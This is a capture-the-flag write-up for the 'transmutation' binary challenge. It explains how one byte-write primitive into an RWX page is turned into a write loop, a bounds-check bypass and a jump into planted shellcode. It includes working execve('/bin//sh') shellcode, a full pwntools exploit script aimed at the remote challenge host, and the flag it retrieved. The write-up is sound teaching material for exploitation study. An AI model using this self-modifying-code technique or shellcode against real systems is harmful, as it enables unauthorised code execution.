pwnfreehard

transmutation

b01lersc

Task: 28-line C program exposing a single byte-write primitive into the first 73 bytes of chall(), whose page is mprotect'd RWX. Solution: patch the final ret to nop so chall falls through into main (creating an infinite write loop), neutralize the LEN bounds check by zeroing a jge displacement, plant execve shellcode after _fini, and flip one byte to transmute main's call chall into jmp short → trampoline → shellcode.

$ ls tags/ techniques/
single_byte_write_primitiveret_to_nop_fallthroughcall_to_jmp_opcode_flipjge_neutralizationinfinite_write_looppost_fini_shellcode_placement

transmutation — b01lersc (BCTF 2026)

Description

To turn one program into another... is it even possible?

ncat --ssl transmutation.opus4-7.b01le.rs 8443

We are given a tiny C program (28 lines) together with its compiled binary (chall, no PIE, partial RELRO) and loader/libc. Each TCP connection spawns a fresh process, reads exactly two bytes (a value c and an offset i), and if i < LEN writes c into the function chall itself. The whole code page is made RWX beforehand. The goal is to execute code.

File list

FilePurpose
chall.c28-line source of the binary (shown below)
challCompiled ELF, no PIE, partial RELRO
libc.so.6, ld-linux-x86-64.so.2Runtime libraries (unused by our exploit)
DockerfileRemote runs under pwn.red/jail (chroot, uid 1000, cwd /app)
flag.txtFlag file at /app/flag.txt on the remote

Source

#include <stdio.h> #include <stdlib.h> #include <sys/mman.h> #define MAIN ((char *)main) #define CHALL ((char *)chall) #define LEN (MAIN - CHALL) int main(void); void chall(void) { char c = getchar(); unsigned char i = getchar(); if (i < LEN) { CHALL[i] = c; } } int main(void) { setbuf(stdin, NULL); setbuf(stdout, NULL); setbuf(stderr, NULL); mprotect((char *)((long)CHALL & ~0xfff), 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC); chall(); return 0; }

Two properties jump out immediately:

  1. main calls chall exactly once. No loop. So a single TCP connection naively gives us one byte-write and then exit(0).
  2. LEN = main - chall = 0x49 (73 bytes). The bounds check restricts us to writing inside chall itself — we cannot write into main, _fini or anywhere else (initially).

If we want to win in one session, we have to turn that one write into many writes and extend our reach. This is the "transmutation."

Analysis

Reverse-engineering chall and main

0000000000401146 <chall>:
  401146: 55                       push  rbp
  401147: 48 89 e5                 mov   rbp, rsp
  40114a: 48 83 ec 10              sub   rsp, 0x10
  40114e: e8 ed fe ff ff           call  0x401040 <getchar@plt>
  401153: 88 45 ff                 mov   [rbp-1], al        ; c
  401156: e8 e5 fe ff ff           call  0x401040 <getchar@plt>
  40115b: 88 45 fe                 mov   [rbp-2], al        ; i
  40115e: 0f b6 55 fe              movzx edx, byte [rbp-2]
  401162: 48 8d 05 26 00 00 00     lea   rax, [rip+0x26]    ; &main
  401169: 48 8d 0d d6 ff ff ff     lea   rcx, [rip-0x2a]    ; &chall
  401170: 48 29 c8                 sub   rax, rcx           ; LEN
  401173: 48 39 c2                 cmp   rdx, rax
  401176: 7d 14                    jge   0x40118c           ; <-- bounds check!
  401178: 0f b6 45 fe              movzx eax, byte [rbp-2]
  40117c: 48 8d 15 c3 ff ff ff     lea   rdx, [rip-0x3d]    ; &chall
  401183: 48 01 c2                 add   rdx, rax
  401186: 0f b6 45 ff              movzx eax, byte [rbp-1]
  40118a: 88 02                    mov   [rdx], al          ; the WRITE
  40118c: 90                       nop
  40118d: c9                       leave
  40118e: c3                       ret                       ; <-- last byte of chall

000000000040118f <main>:
  40118f: 55                       push  rbp
  401190: 48 89 e5                 mov   rbp, rsp
  ...  (three setbuf calls and the mprotect)
  4011e9: e8 62 fe ff ff           call  mprotect
  4011ee: e8 53 ff ff ff           call  0x401146 <chall>   ; <-- flip this!
  4011f3: b8 00 00 00 00           mov   eax, 0x0
  4011f8: 5d                       pop   rbp
  4011f9: c3                       ret

00000000004011fc <_fini>:
  4011fc: 48 83 ec 08              sub   rsp, 0x8
  401200: 48 83 c4 08              add   rsp, 0x8
  401204: c3                       ret
                                    ; 0x401205..0x401fff is zero-filled,
                                    ; still on the RWX page.

Memory layout of the RWX page (0x4010000x401fff)

 offset           |   code
---------------------------------------------------------------
 chall+0x00  (0x401146) | chall() prologue
 chall+0x30  (0x401176) | 7d 14       jge +0x14   <-- LEN check
 chall+0x31  (0x401177) |    ^ displacement byte we overwrite with 0x00
 chall+0x48  (0x40118e) | c3          ret         <-- patch to 0x90 (nop)
 chall+0x49  (0x40118f) | ======== main() begins ========
 chall+0xA8  (0x4011EE) | e8 53 ff ff ff  call chall  <-- flip 0xE8 -> 0xEB
 chall+0xAD  (0x4011F3) | main epilogue
 chall+0xB6  (0x4011FC) | ======== _fini() ========
 chall+0xBE  (0x401204) | c3          ret (end of _fini)
 chall+0xBF  (0x401205) | 00 00 00 ...  <-- 25-byte shellcode goes here
 chall+0xFD  (0x401243) | 00 00        <-- 2-byte trampoline `eb c0` here

All of this is inside the same RWX page (0x401000..0x401fff), so every address we touch is both writable and executable.

Why a single write is not enough

The process reads exactly two bytes, performs one guarded write, then chall returns, main returns, and exit(0) is called. We never get a second chance. The only way to win in one connection is to modify chall so it keeps running — specifically, so that it keeps consuming pairs of bytes from stdin and keeps writing them.

Creating the infinite loop (the first "transmutation")

Look at the addresses around the end of chall:

40118e: c3                       ret      <-- chall's return
40118f: 55                       push rbp <-- main's first byte

chall ends and main begins immediately after. If we replace the ret (0xc3) at offset 0x48 with 0x90 (nop), chall falls through into main. Main runs its prologue, calls setbuf × 3, calls mprotect (a harmless no-op the second time), and then calls chall again. Chall reads two more bytes, writes one more byte, falls through into main again, … forever. We have converted one write into infinitely many writes by paying a single byte.

This is the punchline of the challenge name: by flipping one byte we have literally transmuted one program (a write-then-exit) into another (a write-loop).

Extending reach: neutralizing the bounds check

The loop alone is not enough — we can only touch offsets 0..0x48 inside chall, and there is nothing interesting to patch there except the things we already patched. We need to write into main (to hijack its call chall) and into the zero-padded region after _fini (for the shellcode).

The bounds check is:

401173: 48 39 c2    cmp  rdx, rax
401176: 7d 14       jge  +0x14     ; skip the write if i >= LEN

The jge takes a signed 8-bit displacement. Offset 0x31 in chall holds the displacement byte 0x14. Overwriting it with 0x00 turns the instruction into jge +0x00, which is functionally a nop regardless of flags — control simply falls through to the next instruction, which is the write. The check is now inert and i is effectively an unsigned byte that can index any offset 0..255 from chall. That range covers:

chall   (offset 0x00..0x48)
main    (offset 0x49..0xB5)
_fini   (offset 0xB6..0xBE)
zeros   (offset 0xBF..0xFF)   ← writable & executable, perfect for shellcode

Planting the shellcode

25 bytes of classic execve("/bin//sh", ["/bin//sh", NULL], NULL) shellcode go at offset 0xBF (= 0x401205), which is in the zero-padded tail of the RWX page:

50                     push rax
48 31 d2               xor  rdx, rdx            ; envp = NULL
48 bf 2f 62 69 6e 2f 2f 73 68
                       movabs rdi, "/bin//sh"
57                     push rdi                 ; place string on stack
54 5f                  push rsp / pop rdi       ; rdi -> "/bin//sh"
52 57 54 5e            push rdx / push rdi
                       push rsp / pop rsi       ; rsi -> [&str, NULL]
b0 3b                  mov  al, 0x3b            ; sys_execve
0f 05                  syscall

The call→jmp opcode flip (the second "transmutation")

Main calls chall at 0x4011EE:

4011ee: e8 53 ff ff ff    call 0x401146 <chall>

The opcode e8 is "call rel32" with a 32-bit signed displacement 0xffffff53 (= -0xAD = jump back to chall).
The opcode eb is "jmp rel8" — it takes a single signed byte as displacement and ignores the remaining four bytes. If we flip only the e8 byte to eb, the instruction becomes:

4011ee: eb 53             jmp short 0x401243
4011f0: ff ff ff          (dead bytes, never decoded)

0x401243 is offset 0xFD in chall — inside the zero-padded region. We place a 2-byte trampoline there:

401243: eb c0             jmp short 0x401205   ; -0x40, into our shellcode

Why the detour through a trampoline? Because jmp rel8 can only reach ±127 bytes. From 0x4011F0 (the address after the jmp-short) to the shellcode at 0x401205 is +0x15 — that would fit in a single jmp-short, so technically we could encode jmp +0x15 and land directly. But in this exploit we used the extra trampoline for robustness and to keep the main byte-flip minimal (we only overwrite the single e8eb, never touching the existing displacement 0x53).

0x53 was already there as the low byte of the call displacement; it happens to point to 0x401243, which is a convenient "landing pad" address to hide our trampoline in. That the existing displacement byte lines up so nicely with a reachable free spot is the elegance of the whole trick.

Order of operations matters

  1. Write ret → nop first (offset 0x48). Until this happens we only get one write per process.
  2. Neutralize the LEN check (offset 0x31) before writing anywhere ≥ 0x49, otherwise those writes are silently discarded.
  3. Plant shellcode and trampoline (offsets 0xBF…0xD7, then 0xFD/0xFE) while main still loops calmly via call chall.
  4. Flip calljmp (offset 0xA8) as the final step. The very next iteration of main runs jmp short +0x53 → trampoline → shellcode, and we drop into /bin/sh.

Solution

Each "write" consumes exactly two bytes on stdin: (value, offset). The full exploit is simply a scripted sequence of 32 such pairs.

#!/usr/bin/env python3 """ transmutation — b01lersc Single-byte write primitive into the first 0x49 bytes of chall(). The chall page is mprotect'd RWX, so we can self-modify code. Chain: 1. ret -> nop at chall+0x48 (chall falls through into main -> infinite loop) 2. jge +0x14 -> jge +0x00 at chall+0x31 (LEN bounds check becomes a no-op) 3. Write 25-byte execve("/bin//sh") shellcode at chall+0xBF (=0x401205) 4. Place 2-byte trampoline `eb c0` at chall+0xFD (=0x401243), jumps to 0x401205 5. Flip main's `call chall` (e8 53 ff ff ff) to `jmp short +0x53` (eb 53 ff ff ff) -> trampoline -> shellcode -> /bin/sh """ from pwn import * context.arch = 'amd64' context.log_level = 'info' HOST = 'transmutation.opus4-7.b01le.rs' PORT = 8443 # execve("/bin//sh", ["/bin//sh", NULL], NULL) — 25 bytes shellcode = bytes([ 0x50, # push rax 0x48, 0x31, 0xd2, # xor rdx, rdx 0x48, 0xbf, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x2f, 0x73, 0x68, # movabs rdi, "/bin//sh" 0x57, # push rdi 0x54, 0x5f, # push rsp ; pop rdi 0x52, 0x57, 0x54, 0x5e, # push rdx ; push rdi # push rsp ; pop rsi 0xb0, 0x3b, # mov al, 0x3b (sys_execve) 0x0f, 0x05, # syscall ]) assert len(shellcode) == 25 SC_OFF = 0xBF # shellcode offset (= 0x401205) TRAMP_OFF = 0xFD # trampoline offset (= 0x401243) CALL_OFF = 0xA8 # offset of `call chall` opcode byte in main (= 0x4011EE) def write_byte(io, c: int, i: int): """Ask chall() to write byte c at chall[i].""" io.send(bytes([c & 0xff, i & 0xff])) def pwn(io): # 1. ret -> nop => main keeps calling chall forever write_byte(io, 0x90, 0x48) # 2. jge +0x14 -> jge +0x00 => LEN check bypassed write_byte(io, 0x00, 0x31) # 3. drop shellcode into the zero-padded area after _fini for k, b in enumerate(shellcode): write_byte(io, b, SC_OFF + k) # 4. trampoline `eb c0` at chall+0xFD -> jumps -0x40 into shellcode write_byte(io, 0xEB, TRAMP_OFF) write_byte(io, 0xC0, TRAMP_OFF + 1) # 5. transmute `call chall` (e8 ..) into `jmp short +0x53` (eb ..) write_byte(io, 0xEB, CALL_OFF) # next main iteration executes our shellcode if __name__ == '__main__': import sys, time if len(sys.argv) > 1 and sys.argv[1] == 'local': io = process('./chall') else: io = remote(HOST, PORT, ssl=True) pwn(io) io.sendline(b'cat /app/flag.txt; exit') time.sleep(2) print(io.recvall(timeout=5).decode(errors='replace'))

Running against the remote:

$ python3 exploit.py
[+] Opening connection to transmutation.opus4-7.b01le.rs on port 8443: Done
bctf{CPU_0pt1m1z3r5_H4T3_th15_0n3_51mp13_tr1ck_5519225335}

A note on self-modifying code and CPU pipelines

The challenge flag — "CPU optimizers hate this one simple trick" — is a nod to the fact that on x86/x86-64, self-modifying code does take effect even for instructions very close to the one currently executing, because the architecture is specified to snoop stores against the prefetch/decode queue and invalidate it. That is an unusually strong guarantee compared with most RISC ISAs (ARM/RISC-V require explicit cache flushes and isb/fence.i). It is exactly what lets us patch main's call chall a few bytes before it is fetched and have the CPU honour the new opcode on the very next iteration.

The second "simple trick" is the call rel32jmp rel8 flip: identical first-byte slot in the encoding, identical length at the call site (both are 5 bytes on disk — jmp rel8 is 2 bytes but the remaining 3 bytes are simply unreachable), and a reusable displacement byte that points to a convenient cave. One byte changes, the instruction means something completely different.

$ cat /etc/motd

Liked this one?

Pro unlocks every writeup, every flag, and API access. $9/mo.

$ cat pricing.md